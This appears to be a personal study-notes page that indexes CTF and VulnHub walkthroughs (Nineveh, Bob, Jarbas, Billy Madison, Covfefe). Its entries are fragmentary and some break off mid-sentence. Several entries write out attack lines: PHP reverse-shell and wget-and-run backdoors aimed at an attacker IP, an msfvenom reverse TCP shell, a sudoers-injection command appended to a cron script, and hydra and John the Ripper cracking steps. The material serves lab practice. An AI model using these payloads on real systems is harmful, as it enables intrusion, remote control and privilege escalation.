nagpentest

Walkthru: A.https://v3ded.github.io/ctf/htb-nineveh.html [hydra brute force www, searchsploit php Lite Admin 1.9, hydra brute force https where username is irrevalant but just required to complete the command, php reverse shell, Create a database in phpLiteAdmin and table , directory traversal  ,  chkrootkit   privilege escalation bug,  port knocking ,  strings to extract key from png file  ] Notes: Unable to test it since the VM had static IP. Read Waltthru Make our own .txt backdoor file inside /var/www/html with <?php $sock=fsockopen("YOUR IP",1234);exec("/bin/sh -i <&3 >&3 2>&3");?> as the content Change Database  and add a table inside called shell, select 1 field: Name the field whatever we wish, set it as text type, put  <?php system("wget YOURIP/shell.txt -O /tmp/shell.php; php /tmp/shell.php"); ?>  into the default value & click create. This should create a new table with our exploit.  The default

Walkthru: A. http://www.hackingarticles.in/hack-the-bob-1-0-1-vm-ctf-challenge/[webshell, robotos.txt, reverse shell, combining two o/s commands using && and ||, hidden content/information, spawing a python shell, ssh on non default port, search for txt file, password in text file, gpg file where keys is first alphabets of the line of a file,] B. https://dangwasec.wordpress.com/2018/03/20/ctf-bob-1-0-1-walkthrough/ [burp] C. https://hackso.me/bob-1.0.1-walkthrough/ [PGPCrack-NG is a program designed to brute-force symmetrically encrypted PGP files not useful here] Notes: file notes.sh #!/bin/bash clear echo "-= Notes =-" echo "Harry Potter is my faviorite" echo "Are you the real me?" echo "Right, I'm ordering pizza this is going nowhere" echo "People just don't get me" echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>" echo "Cucumber" echo "Rest now your eyes are slee

error while importing storage

Walkthru. A.https://mrh4sh.github.io/defence-space-solution [PhpmyAdmin,ftp,http/s,default pwd,flag in certificate,ssh on 2225 port, crunch cmd] B. https://mrh4sh.github.io/defence-space-solution [reverse shell using python and SQL ] Notes:

Notes: https://d7x.promiselabs.net/2018/07/26/ctf-jarbas-1-vulnhub-ctf-walkthrough/ [website linked to external website, jenkins, durb using -x option to search for html and php files, unhash pwd, run shell via jenkins web app, msfvenom code base64 encode/decode, privlege escalation adding user in sudo file by adding in sudoer file] Walkthru: Reverse shell steps... 1.  msfvenom -a x64 -p linux/x64/shell_reverse_tcp lhost=192.168.117.4 lport=443 -e x86/shikata_ga_nai -f elf -b '\x00' > shell.bin 2. cat shell.bin | base64 3. echo "replace_it_with_the_content_of_the_shell.bin" | base64 -d > /tmp/shell.bin     chmod +x /tmp/shell.bin     tmp/shell.bin   echo "echo 'jenkins ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers" >> /etc/script/CleaningScript.sh→ where CleaningScript.sh is the file that runs via the the crontab

Walkthru: A. https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/ [dirb, info in source html, password in mysql.conf.d ] Notes:

Walkthru: A. http://touhidshaikh.com/blog/?p=475 [zip2john, burp proxy change user agent vulnerability, php reverse shell] Notes: This VM also has another vulnerability https://www.exploit-db.com/exploits/42003/ which I was able to use to run uname-a and id command in the filename but couldnt do anything beyound that. Unable to run reverse shell. A. Imported the file successfully but do not see any output when command is run via user agent field. No output is shown.

Walkthru: A. https://g0blin.co.uk/billy-madison-1-vulnhub-writeup/ [wordpress running on tcp 69,wpscan, Caesar Cipher tool based on with a rotation of 13 ,dirsearch, smbclient, sending email using swaks, aircrack , suid, running binary file as root and adding user to sudoer , smtpd port 2525, email to backdoor, mapping a shared folder smbclient B. http://www.hackingarticles.in/hack-billy-madison-vm-ctf-challenge/ [wireshark pcap follow TCP stream, dirbuster, hydra brute force ftp] c. https://steemit.com/walkthrough/@shifty0g/billy-madison-1-0-walkthrough [port knocking, dirb] Notes : Had problems with getting the ftp port open. It kept on showing filtered. Telnet also was switching between filter and open. After I fixed the loop with host timeout option, it worked. Based on the lport knocking link, nmap script needed to be run in spefic format.

Walkthru: A. https://cowsayroot.com/walkthrough-covfefe/ [to crack passphrase from SSH private key, mini buffer overflow, buf[20] adding /bin/bash after 20 character ] Notes: http://www.cables.ws/cracking-rsa-private-key-passphrase-with-john-the-ripper/ [to crack passphrase from SSH private key]  1.  Here is an example of what an SSH private key looks like. —–BEGIN RSA PRIVATE KEY—– Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46 DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R 5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6 …….. RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3 —–END RSA PRIVATE KEY—– 2.  In this case create the public/private key pair with a predictable password: /usr/sbin/ssh2john ~/.ssh/id_rsa > id_rsa.hash 3. Next, all you need to do is point John the Ripper to the given file, with your dictionary: /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt id